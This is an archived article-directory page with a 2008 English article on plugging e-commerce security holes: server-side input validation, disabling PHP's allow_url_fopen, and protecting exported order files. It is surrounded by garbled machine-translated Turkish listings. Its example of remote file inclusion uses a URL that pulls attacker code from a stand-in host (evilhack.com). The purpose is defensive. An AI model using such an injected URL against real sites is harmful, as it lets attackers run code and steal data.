E-Ticaret Güvenlik - Güvenlik Delik olunuz

"E-ticaret" Madde
Madde Dizin Ana

Tüm Kategoriler

Internet ve E-İş

E-ticaret

E-Ticaret Güvenlik - Güvenlik Delik olunuz Uzman Yazar: Paul Roberts \| Makale Özet olarak
Sözcük Sayısı: 520 kelime \| İzlenme: 154 View (s)

Security in an e-commerce website needs to be a major consideration when developing an e-commerce website or software. A developer needs to be aware of all the security considerations when designing a site. With e-commerce becoming more commonplace these days, the number of security attacks is certainly increasing. Paranoia is a healthy thing for e-commerce site developers, we need to keep up to gate with security issues, and keep our ears and eyes open. Though the following loopholes are serious, the following loopholes if present are easily fixed.

Listed below are some security considerations to be included when developing a site. This article does not cover e-shoplifting, please see my separate article on this.

User input - every input, whether it be entering a quantity, searching for a product, entering a name etc, needs to be validated for suspicious characters. If this is not done, it is possible to enter “?>”, the closing end tags of PHP and execute some PHP code.

It is far safer allow numbers and characters a-z (capitals included) and 0-9 and nothing else, rather than make a list of all the character that shouldn’t be there. The validation script needs to scroll through each character one by one. This needs to be achieved using in server side validation, not Javascript. Using server side input validation is essential to keep out unwanted characters

There exists another major when executing PHP code. When using PHP there is a setting called allow_url_fopen which enables the opening of files from a PHP script. This setting should be turned off, unless absolutely necessary.

Just imagine you have PHP scripts for both fixed headers and footers, and to access your webpages you would type in http://www.mysite.com/index.php?page=page2. All it takes is a malicious user to run a script by modifying these parameters by typing in “http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt” with some PHP code in the file “hacker.txt”. You could have anything happen, PHP files read, deleted, vital information stolen.

If you are not sure if this setting is on or off, please copy the following PHP code into a text file, and upload it to your web server:

phpinfo();
?>

When you access your script on your webserver, you should come across the setting allow_url_fopen under configuration.

A computer user, under normal circumstances cannot find the value of this setting.

Be careful of exported data like orders, products in CSV and mySQL files. If this data is exported from a script and is kept on the web server under a common file name ie. http://www.mysite.com/admin/output_tables.csv. This is only really a problem when the exported data resides in a file in a directory that is publicly accessible. There is two ways to prevent this security loophole - First have the output file behind a password protected directory, secondly have the data located inside a HTML textarea form element on a script. The storeowner can then copy this information from the textfile and create a new file on their computer and paste the information here.

All it takes is a hacker to find this filename by checking out the e-commerce software’s demo website and look for the same filename on a real site.

Yazar Hakkında / Yazar Bio

Paul Roberts
Bir yazılım geliştirme şirketi E uzmanlaşmış-Ticaret, Arama Motoru Optimizasyonu ve Yazdırma Tahmini yazılım ROBO Tasarım Çözümleri adlı çalıştırın. Ben de adını ROBO Tasarım altında Yeni Zelanda E-Ticaret Çözümleri ve Yazılım geliştirmek.

Article Source: http://www.tr.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Tags: e-commerce, ecommerce, security, loophole, loopholes, plugging, secure, validation

Article Submitted: 2008-06-05 | This Article has been viewed 154 times.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About Secure Computing	Play Video Nasıl Bilgisayarınızı güvenli tutmak için	Play Video Windows Vista'da güvenlik ayarlarını kontrol etmek için

Daha çok "ticaret" İlgili Makaleler

Aşağıda daha eşya "E-ticaret" maddesi kategorisinden yukarıdaki madde ile ilgilidir.

İnsanlar Yukarıdaki makalede "E-Ticaret Güvenlik -" Güvenlik Delik olunuz ilgi de ilgili aşağıda listelenen makalelerde de ilgilendi:

Sizin E-Ticaret İş alınan birçok yapma

Bir e-ticaret iş Koşu sadece web sitesi tutmak ve çalıştırma hakkında değil. Müşterilerin yeteneği telefon, faks, e-posta veya başka yollarla yoluyla hizmet etmek itimat ve tüm sistem gerektirir çalışıyor gibi müşteri isteklerini yerine getirmeye muktedir.

E-Ticaret

Gün geri Sadece bir çift bir arkadaşım ile sohbet başlamıştı. Onun bebek's 1st doğum günü kutlamak ve Kerala ve Chennai, kendi çalışma alanında memleketi arasında çalıştırmak zorunda kaldı. O ve onun daha iyi yarı bu yerler arasında yolculuk son bir ay içinde en az 4 kere.

Salehoo Veya Dünya Markaları?

Eğer zaman herhangi bir tutar için E-ticareti yapıyor varsa, orada toptan dropship dizin hizmetleri hakiki sağlayıcıları daha scamers bilinir olurdu. E dünya-iş, Salehoo ve Dünya çapında markaların son birkaç yıl içinde popülerlik kazandım hem saygın servis sağlayıcılar bulunmaktadır.

Salehoo - güvenilir ve Bırak Gemi Recource Toptan

Eğer hiç bir online perakendeci olan, büyük olasılıkla zaten Salehoo hakkında veya duymuş hatta avantaj kullandılar. Eğer sadece işiniz dışarı ile başlıyor, sen karışık Salehoo ile karıştırılmamalıdır olabilir orada okuyun. Şimdi, Salehoo gerçekten tüm ilgili ve birçok ardı eğilimi teklif hizmetleri ne olduğuna bir göz atalım.

E-ticaret Dünya's New Online Alışveriş Merkezi

Kaç kişi size bir şey çevrimiçi satın almış biliyor musun? Eğer benim gibi oldukça az, bu yüzden e-ticaret, dünyanın yeni online alışveriş merkezi olmasıdır. Ama kim bunlar online perakende mağazaları çalışır? Sizin ve benim gibi bu yüzden bu iş ve patlama yaşıyor şimdi ve gelecekte de patlama devam edecektir Halk.

Drop Nakliye Elektronik Hizmetler yararlanan

Eğer en son elektronik ürünlerin büyük bir yelpaze vardır, kendi elektronik iş online çalışan fikir unutmaya meyillidir. O başlamak için ne zaman ve sağ açılan elektronik servis nakliye tam yararlanmak için seçim için bol miktarda vardır zor değildir.

Kendi Online Perakende Mağaza sahip olmak için Faydaları

Hiç yerel marketten gitmek mi ve eğer sahibi onu nasıl olurdu acaba? İyi bir sahibi olurdu size gibi insanlar? Bu yazı kendi online perakende mağaza ya da yaygın olarak bilinen sahip olma avantajlarını gösterir e-ticaret bir gerçek yerel marketten farklıdır.

�

Aradığınızı bulamıyor musunuz? Google Arama deneyin!

(Dünya çapında hizmet - Mekanlar Çarşamba at olarak güncellenen, 16 Aralık 2009 11:38, Singapur)

Amerika Birleşik Devletleri, USA. Türkiye, İngiltere (İngiltere, İskoçya, Galler, Kuzey İrlanda). Kanada. Afganistan. Arnavutluk. Cezayir. Amerikan Samoası. Andorra. Angola. Anguilla. Antarktika. Antigua & Barbuda. Arjantin. Ermenistan. Aruba. Avustralya. Avusturya. Azerbaycan. Bahamalar. Bahreyn. Bangladeş. Barbados. Beyaz Rusya. Belçika. Belize. Benin. Bermuda. Butan. Bolivya. Bonaire. Bosna-Hersek. Botswana. Brezilya. İngiliz Virgin Adaları. Brunei Darrusalam. Bulgaristan. Burkina Faso. Burundi. Kamboçya. Kamerun. Cape Verde. Cayman Adaları. Orta Afrika Cumhuriyeti. Chad. Kanal Adaları. Chile. Çin. Christmas Adası. Kolombiya. Komoros. Kongo. Kongo (Dem. Rep). Cook Adaları. Kosta Rika. Fildişi Sahili. Hırvatistan. Cuba. Curacao. Kıbrıs. Çek Cumhuriyeti. Danimarka. Cibuti. Dominika. Dominik Cumhuriyeti. Doğu Timor. Ekvator. Mısır. El Salvador. Ekvator Ginesi. Eritre. Estonya. Etiyopya. Falkland Adaları ve bağımlılıkları. Faroe Adaları. Fiji. Finlandiya. Fransa. Fransız Guyanası. Fransız Polinezyası. Gabon. Gambiya. Gaza. Gürcistan. Almanya. Gana. Cebelitarık. Yunanistan. Grönland. Grenada. Guadeloupe. Guam. Guatemala. Gine. Gine-Bissau. Guyana. Haiti. Hawaii Adaları. Honduras. Hong Kong. Macaristan. İzlanda. Hindistan. Indonesia. İran. Irak. Isle Of Man. İsrail. İtalya. Fildişi Sahilleri. Jamaica. Japonya. Johnston Atoll. Ürdün. Kazakistan. Kenya. Kiribati. Kore (Kuzey). Kore (Güney). Kuveyt. Kırgızistan. Laos. Letonya. Lübnan. Rüzgâraltına Adaları. Lesoto. Liberya. Libya. Liechtenstein. Litvanya. Lüksemburg. Macau. Makedonya. Madagaskar. Malavi. Malezya. Maldivler. Mali. Malta. Marshall Adaları. Martinik. Moritanya. Mauritius. Meksika. Mikronezya (Federal Devletleri). Midway Adaları. Moldavya. Monaco. Moğolistan. Montserrat. Fas. Mosquito Coast. Mozambik. Myanmar (Burma). Namibya. Nauru. Navassa Adası. Nepal. Hollanda. Hollanda Antilleri. Yeni Kaledonya. Yeni Zelanda. Nikaragua. Niger. Nijerya. Niue. Norfolk Adası. Kuzey Mariana Adaları. Norveç. Umman. Pakistan. Palau. Filistin. Panama. Papua Yeni Gine. Paracel Adaları. Paraguay. Peru. Philippines. Pitcairn Adaları. Polonya. Portekiz. Porto Riko. Katar. Reunion. Romanya. Rusya. Ruanda. Ryukyu Adaları. Saint Helena. Saint Kitts ve Nevis. Saint Lucia. Saint Pierre & Miquelon. Saint Vincent ve Grenadinler. Samoa. San Marino. Sao Tome & Principe. Suudi Arabistan. Senegal. Sırbistan. Seyşeller. Sierra Leone. Singapur. Slovakya. Slovenya. Solomon Adaları. Somali. Güney Afrika. İspanya. Sri Lanka. Sudan. Surinam. Svaziland. İsveç. İsviçre. Suriye. Tayvan. Tacikistan. Tanzanya. Tayland. Togo. Tonga. Transkei. Trinidad & Tobago. Tunus. Türkiye. Türkmenistan. Turks ve Caicos Adaları. Tuvalu. Virgin Adaları. Uganda. Ukrayna. Birleşik Arap Emirlikleri. Yukarı Volta. Uruguay. Özbekistan. Vanuatu. Vatikan (Vatikan). Venezuela. Vietnam. Wake Adası. Windward Adaları. Yemen. Yugoslavya. Zaire. Zambiya. Zimbabve